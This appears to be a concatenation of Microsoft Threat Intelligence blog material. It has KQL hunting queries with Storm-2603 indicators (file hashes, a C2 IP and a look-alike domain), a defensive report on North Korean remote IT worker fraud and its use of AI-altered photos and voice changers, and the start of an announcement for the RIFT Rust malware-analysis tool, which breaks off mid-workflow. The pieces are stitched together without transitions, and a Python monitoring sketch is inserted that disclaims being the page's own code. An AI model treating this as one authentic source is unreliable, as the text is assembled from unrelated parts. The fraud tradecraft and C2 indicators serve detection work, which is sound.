let ioc_ip_addr = dynamic(["65.38.121.198"]);
let ioc_sha_hashes =dynamic(["92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514",
"24480dbe306597da1ba393b6e30d542673066f98826cc07ac4b9033137f37dbf",
"b5a78616f709859a0d9f830d28ff2f9dbbb2387df1753739407917e96dadf6b0",
"c27b725ff66fdfb11dd6487a3815d1d1eba89d61b0e919e4d06ed3ac6a74fe94",
"1eb914c09c873f0a7bcf81475ab0f6bdfaccc6b63bf7e5f2dbf19295106af192",
"4c1750a14915bf2c0b093c2cb59063912dfa039a2adfe6d26d6914804e2ae928",
"83705c75731e1d590b08f9357bc3b0f04741e92a033618736387512b40dab060",
"f54ae00a9bae73da001c4d3d690d26ddf5e8e006b5562f936df472ec5e299441",
"b180ab0a5845ed619939154f67526d2b04d28713fcc1904fbd666275538f431d",
"6753b840cec65dfba0d7d326ec768bff2495784c60db6a139f51c5e83349ac4d",
"7ae971e40528d364fa52f3bb5e0660ac25ef63e082e3bbd54f153e27b31eae68",
"567cb8e8c8bd0d909870c656b292b57bcb24eb55a8582b884e0a228e298e7443",
"445a37279d3a229ed18513e85f0c8d861c6f560e0f914a5869df14a74b679b86",
"ffbc9dfc284b147e07a430fe9471e66c716a84a1f18976474a54bee82605fa9a",
"6b273c2179518dacb1218201fd37ee2492a5e1713be907e69bf7ea56ceca53a5",
"c2c1fec7856e8d49f5d49267e69993837575dbbec99cd702c5be134a85b2c139"]);
_Im_WebSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstIpAddr in (ioc_ip_addr) or FileSHA256 in (ioc_sha_hashes)
| summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated),
EventCount=count() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor
Storm-2603 C2 communication
Look for devices that may have communicated with Storm-2603 C2 infrastructure as part of this activity.
//IP list and domain list- _Im_NetworkSession
let lookback = 30d;
let ioc_ip_addr = dynamic(["65.38.121.198"]);
let ioc_domains = dynamic(["update.updatemicfosoft.com"]);
_Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains)
| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated),
EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor
Microsoft Security Copilot
Microsoft Security Copilot customers can use the standalone experience to create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
MITRE ATT&CK techniques observed
Threat actors have exhibited use of the following attack techniques. For standard industry documentation about these techniques, refer to the MITRE ATT&CK framework.
T1569.002 System Services: Service Execution | Windows service control manager is abused to disable Microsoft Defender protections through registry modifications and launch PsExec
Meet the experts behind Microsoft Threat Intelligence, Incident Response, and the Microsoft Security Response Center at our VIP Mixer at Black Hat 2025. Discover how our end-to-end platform can help you strengthen resilience and elevate your security posture.
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Since 2024, Microsoft Threat Intelligence has observed remote information technology (IT) workers deployed by North Korea leveraging AI to improve the scale and sophistication of their operations, steal data, and generate revenue for the Democratic People’s Republic of Korea (DPRK). The changes noted in North Korean remote IT worker tactics, techniques, and procedures (TTPs) include the use of AI tools to replace images in stolen employment and identity documents and to enhance North Korean IT worker photos so they appear more professional. We’ve also observed them using voice-changing software.
North Korea has deployed thousands of remote IT workers to assume jobs in software and web development as part of a revenue generation scheme for the North Korean government. These highly skilled workers are most often located in North Korea, China, and Russia, and use tools such as virtual private networks (VPNs) and remote monitoring and management (RMM) tools together with witting accomplices to conceal their locations and identities.
Historically, North Korea’s fraudulent remote worker scheme has focused on targeting United States (US) companies in the technology, critical manufacturing, and transportation sectors. However, we’ve observed North Korean remote workers evolving to broaden their scope to target various industries globally that offer technology-related roles. Since 2020, the US government and cybersecurity community have identified thousands of North Korean workers infiltrating companies across various industries.
Organizations can protect themselves from this threat by implementing stricter pre-employment vetting measures and creating policies to block unapproved IT management tools. For example, when evaluating potential employees, employers and recruiters should ensure that the candidates’ social media and professional accounts are unique and verify their contact information and digital footprint. Organizations should also be particularly cautious with staffing company employees, check for consistency in resumes, and use video calls to confirm a worker’s identity.
Microsoft Threat Intelligence tracks North Korean IT remote worker activity as Jasper Sleet (formerly known as Storm-0287). We also track several other North Korean activity clusters that pursue fraudulent employment using similar techniques and tools, including Storm-1877 and Moonstone Sleet. To disrupt this activity and protect our customers, we’ve suspended 3,000 known Microsoft consumer accounts (Outlook/Hotmail) created by North Korean IT workers. We have also implemented several detections to alert our customers of this activity through Microsoft Entra ID Protection and Microsoft Defender XDR as noted at the end of this blog. As with any observed nation-state threat actor activity, Microsoft has directly notified targeted or compromised customers, providing them with important information needed to secure their environments. As we continue to observe more attempts by threat actors to leverage AI, not only do we report on them, but we also have principles in place to take action against them.
This blog provides additional information on the North Korean remote IT worker operations we published previously, including Jasper Sleet’s usual TTPs to secure employment, such as using fraudulent identities and facilitators. We also provide recent observations regarding their use of AI tools. Finally, we share detailed guidance on how to investigate, monitor, and remediate possible North Korean remote IT worker activity, as well as detections and hunting capabilities to surface this threat.
From North Korea to the world: The remote IT workforce
Since at least early 2020, Microsoft has tracked a global operation conducted by North Korea in which skilled IT workers apply for remote job opportunities to generate revenue and support state interests. These workers present themselves as foreign (non-North Korean) or domestic-based teleworkers and use a variety of fraudulent means to bypass employment verification controls.
North Korea’s fraudulent remote worker scheme has since evolved, establishing itself as a well-developed operation that has allowed North Korean remote workers to infiltrate technology-related roles across various industries. In some cases, victim organizations have even reported that remote IT workers were some of their most talented employees. Historically, this operation has focused on applying for IT, software development, and administrator positions in the technology sector. Such positions provide North Korean threat actors access to highly sensitive information to conduct information theft and extortion, among other operations.
North Korean IT workers are a multifaceted threat because not only do they generate revenue for the North Korean regime, which violates international sanctions, they also use their access to steal sensitive intellectual property, source code, or trade secrets. In some cases, these North Korean workers even extort their employer into paying them in exchange for not publicly disclosing the company’s data.
Between 2020 and 2022, the US government found that over 300 US companies in multiple industries, including several Fortune 500 companies, had unknowingly employed these workers, indicating the magnitude of this threat. The workers also attempted to gain access to information at two government agencies. Since then, the cybersecurity community has continued to detect thousands of North Korean workers. On January 3, 2025, the Justice Department released an indictment identifying two North Korean nationals and three facilitators responsible for conducting fraudulent work between 2018 and 2024. The indicted individuals generated a revenue of at least US$866,255 from only ten of the at least 64 infiltrated US companies.
North Korean threat actors are evolving across the threat landscape to incorporate more sophisticated tactics and tools to conduct malicious employment-related activity, including the use of custom and AI-enabled software.
Tactics and techniques
The tactics and techniques employed by North Korean remote IT workers involve a sophisticated ecosystem of crafting fake personas, performing remote work, and securing payments. North Korean IT workers apply for remote roles, in various sectors, at organizations across the globe.
They create, rent, or procure stolen identities that match the geo-location of their target organizations (for example, they would establish a US-based identity to apply for roles at US-based companies), create email accounts and social media profiles, and establish legitimacy through fake portfolios and profiles on developer platforms like GitHub and LinkedIn. Additionally, they leverage AI tools to enhance their operations, including image creation and voice-changing software. Facilitators play a crucial role in validating fraudulent identities and managing logistics, such as forwarding company hardware and creating accounts on freelance job websites. To evade detection, these workers use VPNs, virtual private servers (VPSs), and proxy services as well as RMM tools to connect to a device housed at a facilitator’s laptop farm located in the country of the job.
Figure 1. The North Korean IT worker ecosystem
Crafting fake personas and profiles
The North Korean remote IT worker fraud scheme begins with the procurement of identities for the workers. These identities, which can be stolen or “rented” from witting individuals, include names, national identification numbers, and dates of birth. The workers might also leverage services that generate fraudulent identities, complete with seemingly legitimate documentation, to fabricate their personas. They then create email accounts and social media pages they use to apply for jobs, often indirectly through staffing or contracting companies. They also apply for freelance opportunities through freelancer sites as an additional avenue for revenue generation. Notably, they often use the same names/profiles repeatedly rather than creating unique personas for each successful infiltration.
Additionally, the North Korean IT workers have used fake profiles on LinkedIn to communicate with recruiters and apply for jobs.
Figure 2. An example of a North Korean IT worker LinkedIn profile that has since been taken down.
The workers tailor their fake resumes and profiles to match the requirements of specific remote IT positions, increasing their chances of being selected. Over time, we’ve observed these fake resumes and employee documents improving noticeably in quality: they now appear more polished and free of grammatical errors, an improvement facilitated by AI.
Establishing digital footprint
After creating their fake personas, the North Korean IT workers then attempt to establish legitimacy by creating digital footprints for these fake personas. They typically leverage communication, networking, and developer platforms (for example, GitHub) to showcase their supposed portfolio of previous work samples:
Figure 3. Example profile used by a North Korean IT worker that has since been taken down.
Using AI to improve operations
Microsoft Threat Intelligence has observed North Korean remote IT workers leveraging AI to improve the quantity and quality of their operations. For example, in October 2024, we found a public repository containing actual and AI-enhanced images of suspected North Korean IT workers:
Figure 4. Photos of potential North Korean IT workers
The repository also contained the resumes and email accounts used by the said workers, along with the following tools and resources they can use to secure employment and to do their work:
VPS and VPN accounts, along with specific VPS IP addresses
Playbooks on conducting identity theft and creating and bidding jobs on freelancer websites
Wallet information and suspected payments made to facilitators
LinkedIn, GitHub, Upwork, TeamViewer, Telegram, and Skype accounts
Tracking sheet of work performed, and payments received by the IT workers
Image creation
Based on our review of the repository mentioned previously, North Korean IT workers appear to conduct identity theft and then use AI tools like Faceswap to move their pictures over to the stolen employment and identity documents. The attackers also use these AI tools to take pictures of the workers and move them to more professional-looking settings. The workers then use these AI-generated pictures on one or more resumes or profiles when applying for jobs.
Figure 5. Use of AI apps to modify photos used for North Korean IT workers’ resumes and profiles
Figure 6. Examples of resumes for North Korean IT workers. These two resumes use different versions of the same photo.
Communications
Microsoft Threat Intelligence has observed that North Korean IT workers are also experimenting with other AI technologies such as voice-changing software. While we haven’t observed threat actors using combined AI voice and video products as a tactic first hand, we do recognize that combining these technologies could allow future threat actor campaigns to trick interviewers into thinking they aren’t communicating with a North Korean IT worker. If successful, this tactic could allow the North Korean IT workers to do interviews directly and no longer rely on facilitators standing in for them on interviews or selling them account access.
Facilitators for initial access
North Korean remote IT workers require assistance from a witting facilitator to help find jobs, pass the employment verification process, and once hired, successfully work remotely. We’ve observed Jasper Sleet advertising job opportunities for facilitator roles under the guise of partnering with a remote job candidate to help secure an IT role in a competitive market:
Figure 7. Example of a job opportunity for a facilitator role
The IT workers may have the facilitators assist in creating accounts on remote and freelance job websites. They might also ask the facilitator to perform the following tasks as their relationship builds:
Create a bank account for the North Korean IT worker, or lend their (the facilitator’s) own account to the worker
Purchase mobile phone numbers or SIM cards
During the employment verification process, the witting accomplice helps the North Korean IT workers validate the latter’s fraudulent identities using online background check service providers. The documents submitted by the workers include fake or stolen drivers’ licenses, social security cards, passports, and permanent resident identification cards. Workers train using interview scripts, which include a justification for why the employee must work remotely.
Once hired, the remote workers direct company laptops and hardware to be sent to the address of the accomplice. The accomplice then either runs a laptop farm that provides the laptops with an internet connection at the geo-location of the role or forwards the items internationally. For hardware that remains in the country of the role, the accomplice signs into the computers and installs software that enables the workers to connect remotely. Remote IT workers might also access devices remotely using IP-based KVM devices, like PiKVM or TinyPilot.
Defense evasion and persistence
To conceal their physical location as well as maintain persistence and blend into the target organization’s environment, the workers typically use VPNs (particularly Astrill VPN), VPSs, proxy services, and RMM tools. Microsoft Threat Intelligence has observed the persistent use of JumpConnect, TinyPilot, Rust Desk, TeamViewer, AnyViewer, and Anydesk. When an in-person presence or face-to-face meeting is required, for example to confirm banking information or attend a meeting, the workers have been known to pay accomplices to stand in for them. When possible, however, the workers eliminate all face-to-face contact, offering fraudulent excuses for why they are not on camera during video teleconferencing calls or speaking.
Attribution
Microsoft Threat Intelligence uses the name Jasper Sleet (formerly known as Storm-0287) to represent activity associated with North Korea’s remote IT worker program. These workers are primarily focused on revenue generation, use remote access tools, and likely fall under a particular leadership structure in North Korea. We also track several other North Korean activity clusters that pursue fraudulent employment using similar techniques and tools, including Storm-1877 and Moonstone Sleet.
How Microsoft disrupts North Korean remote IT worker operations with machine learning
Microsoft has successfully scaled analyst tradecraft to accelerate the identification and disruption of North Korean IT workers in customer environments by developing a custom machine learning solution. This has been achieved by leveraging Microsoft’s existing threat intelligence and weak signals generated by monitoring for many of the red flags listed in this blog, among others. For example, this solution uses impossible time travel risk detections, most commonly between a Western nation and China or Russia. The machine learning workflow uses these features to surface suspect accounts most likely to be North Korean IT workers for assessment by Microsoft Threat Intelligence analysts.
Once Microsoft Threat Intelligence reviews and confirms that an account is indeed associated with a North Korean IT worker, customers are then notified with a Microsoft Entra ID Protection risk detection warning of a risky sign-in based on Microsoft’s threat intelligence. Microsoft Defender XDR customers also receive the alert Sign-in activity by a suspected North Korean entity in the Microsoft Defender portal.
Defending against North Korean remote IT worker infiltration
Defending against the threats from North Korean remote IT workers involves a threefold strategy:
Ensuring a proper vetting approach is in place for freelance workers and vendors
Monitoring for anomalous user activity
Responding to suspected Jasper Sleet signals in close coordination with your insider risk team
Investigate
How can you identify a North Korean remote IT worker in the hiring process?
To protect your organization against a potential North Korean insider threat, it is important for your organization to prioritize a process for verifying employees to identify potential risks. The following can be used to assess potential employees:
Confirm the potential employee has a digital footprint and look for signs of authenticity. This includes a real phone number (not VoIP), a residential address, and social media accounts. Ensure the potential employee’s social media/professional accounts are not highly similar to the accounts of other individuals. In addition, check that the contact phone number listed on the potential employee’s account is unique and not also used by other accounts.
Scrutinize resumes and background checks for consistency of names, addresses, and dates. Consider contacting references by phone or video-teleconference rather than email only.
Exercise greater scrutiny for employees of staffing companies, since this is the easiest avenue for North Korean workers to infiltrate target companies.
Search whether a potential employee is employed at multiple companies using the same persona.
Ensure the potential employee is seen on camera during multiple video telecommunication sessions. If the potential employee reports video and/or microphone issues that prohibit participation, this should be considered a red flag.
During video verification, request individuals to physically hold driver’s licenses, passports, or identity documents up to camera.
Keep records, including recordings of video interviews, of all interactions with potential employees.
Require notarized proof of identity.
Monitor
How can your organization prevent falling victim to the North Korean remote IT worker technique?
To prevent the risks associated with North Korean insider threats, it’s vital to monitor for activity typically associated with this fraudulent scheme.
Monitor for identifiable characteristics of North Korean remote workers
Microsoft has identified the following characteristics of a North Korean remote worker. Note that not all the criteria are necessarily required, and further, a positive identification of a remote worker doesn’t guarantee that the worker is North Korean.
The employee lists a Chinese phone number on social media accounts that is used by other accounts.
The worker’s work-issued laptop authenticates from an IP address of a known North Korean IT worker laptop farm, or from foreign—most commonly Chinese or Russian—IP addresses even though the worker is supposed to have a different work location.
The worker is employed at multiple companies using the same persona. Employees of staffing companies require heightened scrutiny, given this is the easiest way for North Korean workers to infiltrate target companies.
Once a laptop is issued to the worker, RMM software is immediately downloaded onto it and used in combination with a VPN.
The worker has never been seen on camera during a video telecommunication session or is only seen a few times. The worker may also report video and/or microphone issues that prohibit participation from the start.
The worker’s online activity doesn’t align with routine co-worker hours, with limited engagement across approved communication platforms.
Monitor for activity associated with Jasper Sleet access
If RMM tools are used in your environment, enforce security settings where possible, including MFA, and take the following steps:
Use Windows Defender Application Control or AppLocker to create policies to block unapproved IT management tools. Consider hunting for unapproved RMM software installations and creating custom detections (Investigation & response > Hunting > Advanced hunting > Manage rules > Create custom detection) for any advanced hunting queries that are useful indicators of anomalous or unapproved activity in your environment.
If an unapproved installation is discovered, reset passwords for accounts used to install the RMM services. If a system-level account was used to install the software, further investigation may be warranted.
Monitor for impossible travel—for example, a supposedly US-based employee signing in from China or Russia.
Monitor for use of public VPNs such as Astrill. For example, IP addresses associated with VPNs known to be used by Jasper Sleet can be added to Sentinel watchlists. Or, Microsoft Defender for Identity can integrate with your VPN solution to provide more information about user activity, such as extra detection for abnormal VPN connections.
Monitor for signals of insider threats in your environment. Microsoft Purview Insider Risk Management can help identify potentially malicious or inadvertent insider risks.
Monitor for consistent user activity outside of typical working hours.
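As an added example (not Microsoft’s or the page’s own code), here is a Python sketch of three of the monitoring checks above run over constructed sample telemetry: impossible travel between consecutive sign-ins, sign-ins from watchlisted VPN ranges, and an RMM executable appearing within a day of a laptop being issued. The event shapes, the 900 km/h and 24-hour thresholds, the executable names, and the watchlist ranges (RFC 5737 test addresses, not real indicators) are assumptions.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network
from math import asin, cos, radians, sin, sqrt
from typing import Dict, List, Tuple


@dataclass
class SignIn:
    """One sign-in event with geo-IP enrichment (field layout is an assumption)."""
    user: str
    time: datetime
    ip: str
    country: str
    lat: float
    lon: float


# Placeholder watchlist ranges (RFC 5737 test networks, NOT real VPN indicators);
# in production this would be fed from your Sentinel watchlist.
VPN_WATCHLIST = [ip_network("203.0.113.0/24"), ip_network("198.51.100.0/24")]
MAX_PLAUSIBLE_KMH = 900.0         # assumed ceiling: roughly airliner ground speed
RMM_WINDOW = timedelta(hours=24)  # assumed meaning of "immediately after issuance"
# Typical executable names for tools named on the page (an assumption).
RMM_EXECUTABLES = {"anydesk.exe", "teamviewer.exe", "rustdesk.exe", "anyviewer.exe"}


def haversine_km(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance between two points in kilometres."""
    dlat = radians(lat2 - lat1)
    dlon = radians(lon2 - lon1)
    a = sin(dlat / 2) ** 2 + cos(radians(lat1)) * cos(radians(lat2)) * sin(dlon / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


def impossible_travel(events: List[SignIn]) -> List[Tuple[str, str, str, float]]:
    """Flag consecutive sign-ins per user whose implied speed is implausible.

    Returns (user, from_country, to_country, km/h) for each flagged pair.
    """
    hits = []
    by_user: Dict[str, List[SignIn]] = {}
    for ev in sorted(events, key=lambda e: e.time):
        by_user.setdefault(ev.user, []).append(ev)
    for user, seq in by_user.items():
        for prev, cur in zip(seq, seq[1:]):
            hours = (cur.time - prev.time).total_seconds() / 3600.0
            km = haversine_km(prev.lat, prev.lon, cur.lat, cur.lon)
            # Zero elapsed time with a real distance is also impossible travel.
            speed = km / hours if hours > 0 else (float("inf") if km > 0 else 0.0)
            if speed > MAX_PLAUSIBLE_KMH:
                hits.append((user, prev.country, cur.country, round(speed, 1)))
    return hits


def watchlist_hits(events: List[SignIn]) -> List[Tuple[str, str]]:
    """Return (user, ip) for sign-ins originating from watchlisted VPN ranges."""
    return [(e.user, e.ip) for e in events
            if any(ip_address(e.ip) in net for net in VPN_WATCHLIST)]


def rmm_after_issuance(issued: Dict[str, datetime],
                       proc_events: List[Tuple[str, datetime, str]]) -> List[Tuple[str, str]]:
    """Return (device, executable) where an RMM tool ran within RMM_WINDOW of issuance."""
    hits = []
    for device, when, exe in proc_events:
        if exe.lower() in RMM_EXECUTABLES and device in issued:
            if timedelta(0) <= when - issued[device] <= RMM_WINDOW:
                hits.append((device, exe))
    return hits


# Constructed sample telemetry (not real data): alice hops US -> CN in 90 minutes,
# bob makes a plausible Seattle -> Portland trip, carol arrives from a watchlisted range.
SAMPLE_SIGNINS = [
    SignIn("alice@contoso.example", datetime(2025, 3, 3, 9, 0), "192.0.2.10", "US", 47.6, -122.3),
    SignIn("alice@contoso.example", datetime(2025, 3, 3, 10, 30), "192.0.2.77", "CN", 41.8, 123.4),
    SignIn("bob@contoso.example", datetime(2025, 3, 3, 9, 0), "192.0.2.20", "US", 47.6, -122.3),
    SignIn("bob@contoso.example", datetime(2025, 3, 3, 12, 0), "192.0.2.21", "US", 45.5, -122.7),
    SignIn("carol@contoso.example", datetime(2025, 3, 3, 9, 5), "203.0.113.7", "US", 40.7, -74.0),
]
SAMPLE_ISSUED = {"LAPTOP-01": datetime(2025, 3, 3, 15, 0), "LAPTOP-02": datetime(2025, 1, 1, 9, 0)}
SAMPLE_PROCS = [
    ("LAPTOP-01", datetime(2025, 3, 3, 16, 10), "AnyDesk.exe"),     # 70 min after issuance
    ("LAPTOP-02", datetime(2025, 2, 15, 11, 0), "TeamViewer.exe"),  # weeks later: not flagged here
    ("LAPTOP-01", datetime(2025, 3, 3, 15, 30), "explorer.exe"),    # not an RMM tool
]

if __name__ == "__main__":
    print("impossible travel:", impossible_travel(SAMPLE_SIGNINS))
    print("VPN watchlist:", watchlist_hits(SAMPLE_SIGNINS))
    print("RMM after issuance:", rmm_after_issuance(SAMPLE_ISSUED, SAMPLE_PROCS))
```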
Remediate
What are the next steps if you positively identify a North Korean remote IT worker employed at your company?
Because Jasper Sleet activity follows legitimate job offers and authorized access, Microsoft recommends approaching confirmed or suspected Jasper Sleet intrusions with an insider risk approach using your organization’s insider risk response plan or incident response provider like Microsoft Incident Response. Some steps might include:
Restrict response efforts to a small, trusted insider risk working group, trained in operational security (OPSEC) to avoid tipping off subjects and potential collaborators.
Rapidly evaluate the subject’s proximity to critical assets, such as:
Leadership or sensitive teams
Direct reports or vendor staff the subject has influence over
Suppliers or vendors
People/non-people accounts, production/pre-production environments, shared accounts, security groups, third-party accounts, distribution groups, data clusters, and more
Conduct preliminary link analysis to:
Detect relationships with potential collaborators, supporters, or other potential aliases operated by the same actor
Identify shared indicators (for example, shared IP addresses, behavioral overlap)
Avoid premature action that might alert other Jasper Sleet operators
Conduct a risk-based prioritization of efforts, informed by:
Placement and access to critical assets (not necessarily where you identified them)
Stakeholder insight from potentially impacted business units
Business impact considerations of containment (which might support additional collection/analysis) or mitigation (for example, eviction)
Conduct open-source intelligence (OSINT) collection and analysis to:
Determine if the identity associated with the threat actor is associated with a real person. For example, North Korean IT workers have leveraged stolen identities of real US persons to facilitate their fraud. Conduct OSINT on all available personally identifiable information (PII) provided by the actor (name, date of birth, SSN, home of record, phone number, emergency contact, and others) and determine if these items are linked to additional North Korean actors, and/or real persons’ identities.
Gather all known external accounts operated by the alias/persona (for example, LinkedIn, GitHub, freelance working sites, bug bounty programs).
Perform analysis on account images using open-source tools such as FaceForensics++ to determine prevalence of AI-generated content. Detection opportunities within video and imagery include:
Temporal consistency issues: Rapid movements cause noticeable artifacts in video deepfakes as the tracking system struggles to maintain accurate landmark positioning.
Occlusion handling: When objects pass over the AI-generated content such as the face, deepfake systems tend to fail at properly reconstructing the partially obscured face.
Lighting adaptation: Changes in lighting conditions might reveal inconsistencies in the rendering of the face.
Audio-visual synchronization: Slight delays between lip movements and speech are detectable under careful observation.
Exaggerated facial expressions.
Duplicative or improperly placed appendages.
Pixelation or tearing at edges of face, eyes, ears, and glasses.
Engage counterintelligence or insider risk/threat teams to:
Understand tradecraft and likely next steps
Gain national-level threat context, if applicable
Make incremental, risk-based investigative and response decisions with the support of your insider threat working group and your insider threat stakeholder group; one providing tactical feedback and the other providing risk tolerance feedback.
Preserve evidence and document findings.
Share lessons learned and increase awareness.
Educate employees on the risks associated with insider threats and provide regular security training for employees to recognize and respond to threats, including a section on the unique threat posed by North Korean IT workers.
After an insider risk response to Jasper Sleet, it might be necessary to also conduct a thorough forensic investigation of all systems that the employee had access to for indicators of persistence, such as RMM tools or system/resource modifications.
For additional resources, refer to CISA’s Insider Threat Mitigation Guide. If you suspect your organization is being targeted by nation-state cyber activity, report it to the appropriate national authority. For US-based organizations, the Federal Bureau of Investigation (FBI) recommends reporting North Korean remote IT worker activity to the Internet Crime Complaint Center (IC3).
Microsoft Defender XDR detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Microsoft Defender XDR
Alerts with the following title in the security center can indicate threat activity on your network:
Sign-in activity by a suspected North Korean entity
Microsoft Defender for Endpoint
Alerts with the following titles in the security center can indicate Jasper Sleet RMM activity on your network. These alerts, however, can be triggered by unrelated threat activity.
Suspicious usage of remote management software
Suspicious connection to remote access software
Microsoft Defender for Identity
Alerts with the following titles in the security center can indicate atypical identity access on your network. These alerts, however, can be triggered by unrelated threat activity.
Atypical travel
Suspicious behavior: Impossible travel activity
Microsoft Entra ID Protection
Microsoft Entra ID Protection risk detections inform Entra ID user risk events and can indicate associated threat activity, including unusual user activity consistent with known patterns identified by Microsoft Threat Intelligence research. Note, however, that these alerts can also be triggered by unrelated threat activity.
Microsoft Entra threat intelligence (sign-in): (RiskEventType: investigationsThreatIntelligence)
Microsoft Defender for Cloud Apps
Alerts with the following titles in the security center can indicate atypical identity access on your network. These alerts, however, can be triggered by unrelated threat activity.
Impossible travel activity
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:
Incident investigation
Microsoft User analysis
Threat actor profile
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Hunting queries
Microsoft Defender XDR
Because organizations might have legitimate and frequent uses for RMM software, we recommend using the Microsoft Defender XDR advanced hunting queries available on GitHub to locate RMM software that hasn’t been endorsed by your organization for further investigation. In some cases, these results might include benign activity from legitimate users. Regardless of use case, all newly installed RMM instances should be scrutinized and investigated.
If any queries have high fidelity for discovering unsanctioned RMM instances in your environment, and don’t detect benign activity, you can create a custom detection rule from the advanced hunting query in the Microsoft Defender portal.
Microsoft Sentinel
The alert Insider Risk Sensitive Data Access Outside Organizational Geo-location joins Azure Information Protection logs (InformationProtectionLogs_CL) with Microsoft Entra ID sign-in logs (SigninLogs) to provide a correlation of sensitive data access by geo-location. Results include:
User principal name
Label name
Activity
City
State
Country/Region
Time generated
The recommended configuration is to include (or exclude) sign-in geo-locations (city, state, country and/or region) for trusted organizational locations. There is an option for configuration of correlations against Microsoft Sentinel watchlists. Accessing sensitive data from a new or unauthorized geo-location warrants further review.
Today, Microsoft Threat Intelligence Center is excited to announce the release of RIFT, a tool designed to help malware analysts automate the identification of attacker-written code within Rust binaries. Known for its efficiency, type safety, and robust memory safety, Rust has increasingly become a tool for creating malware, especially among financially motivated groups and nation-state entities. This shift has introduced new challenges for malware analysts as the unique characteristics of Rust binaries make static analysis more complex.
One of the primary challenges in reverse engineering malware developed with Rust lies in its layers of abstraction added through features such as memory safety and concurrency handling, making it more challenging to identify the behavior and intent of the malware. Compared to traditional languages, Rust binaries are often larger and more complex due to the incorporation of extensive library code. Consequently, reverse engineers must undertake the demanding task of distinguishing attacker-written code from standard library code, necessitating advanced expertise and specialized tools.
To address these pressing challenges, Microsoft Threat Intelligence Center has developed RIFT. RIFT underscores the growing need for specialized tools as cyber threat actors continue to leverage Rust’s features to evade detection and complicate analysis. The adoption of Rust by threat actors is a stark reminder of the ever-changing tactics employed in the cyber domain, and the increasing sophistication required to combat these threats effectively. In this blog post, we explore how threat actors are increasingly adopting Rust for malware development due to its versatility and how RIFT can be used to combat this threat by enhancing the efficiency and accuracy of Rust-based malware analysis.
Threat actors continue adopting Rust
As Rust gains popularity as a rapidly growing programming language, its use by malware authors is becoming more noticeable. Over the past five years, Microsoft Threat Intelligence Center and the broader security industry have observed financially motivated and state-supported groups increasingly using Rust for malware development.
Figure 1. Timeline of Rust-based threats
In 2021, the group behind the notorious BlackCat ransomware was among the first significant entities in the ransomware field to write their malicious programs in Rust. Following the appearance of the first malware families written in Rust, reverse engineers indicated that such malware presents a unique challenge for analysis.
Subsequently, several other groups began developing or rewriting their tools in the programming language. Nation-state threat actors have also selectively developed their malware in Rust.
Rust as a popular language for malware development
Rust is a versatile language known for its performance, type safety, concurrency, and memory safety. While these features benefit legitimate development, they also complicate static analysis of malicious files. The community has extensively addressed many of these challenges. One of the core issues in analyzing Rust binaries is differentiating between library code and code written by malware authors.
To illustrate the significance of this problem, Microsoft Threat Intelligence Center conducted a simple experiment. A small PE EXE file that downloads data from a website and saves it on disk as sample_data.txt is generated with Microsoft 365 Copilot. The program is first compiled in C++ and then in Rust. The C++ program is compiled using Microsoft Visual C++ (MSVC) with Visual Studio 2022, in release mode for the 64-bit architecture and dynamically linked, using default settings. The Rust binary is compiled using compiler version rustc 1.89.0-nightly (16d2276fa 2025-05-16), also in release mode and with default settings.
Figure 2. Simple downloader program in C++ to the left and Rust to the right
Next, both programs are loaded into IDA Pro, and a simple complexity analysis is performed by counting and comparing the number of disassembled and identified functions. Additionally, functions are categorized as annotated or not annotated. An annotated function is one that is automatically detected by IDA’s built-in signatures or algorithms. It should be noted that IDA has capabilities to enhance library recognition, but these were not used for this experiment.
While both programs implement similar functionality, the total number of disassembled functions in the C++ program is lower than 100, while the Rust program packs almost 10,000 functions. Furthermore, the size of the C++ program is lower than 20 KB, while the Rust program is larger than 3 MB.
Programs written in Rust are typically statically linked, embedding all dependencies directly into the executable. As a result, binaries are larger with a high volume of functions, requiring analysts to distinguish first between third-party library code and attacker-authored logic.
To address this key problem, Microsoft Threat Intelligence Center is releasing an internally developed tool: RIFT.
This open-source project is designed to help reverse engineers and analysts more efficiently identify attacker-authored logic within Rust-based malware.
From source code to binary
Figure 3. Overview of Rust developer toolset
Before delving into the inner workings of RIFT, it is essential to have a fundamental understanding of how Rust binaries are compiled. As illustrated in the diagram above, Rust developers typically engage with three primary components and two endpoints:
cargo – The package manager
rustc – The Rust compiler
rustup – The Rust update manager
static.rust-lang.org – S3 bucket that hosts pre-compiled compilers and toolchains
crates.io – Rust community’s crate registry
Once a developer has conceptualized what they intend to develop, a typical workflow may proceed as follows:
Using the cargo tool, the developer initializes a new project named “test”.
They opt not to use the latest Rust compiler but a specific version. They execute rustup install 1.84.0-x86_64-pc-windows-msvc to install the desired compiler version and configure the project to use the installed compiler.
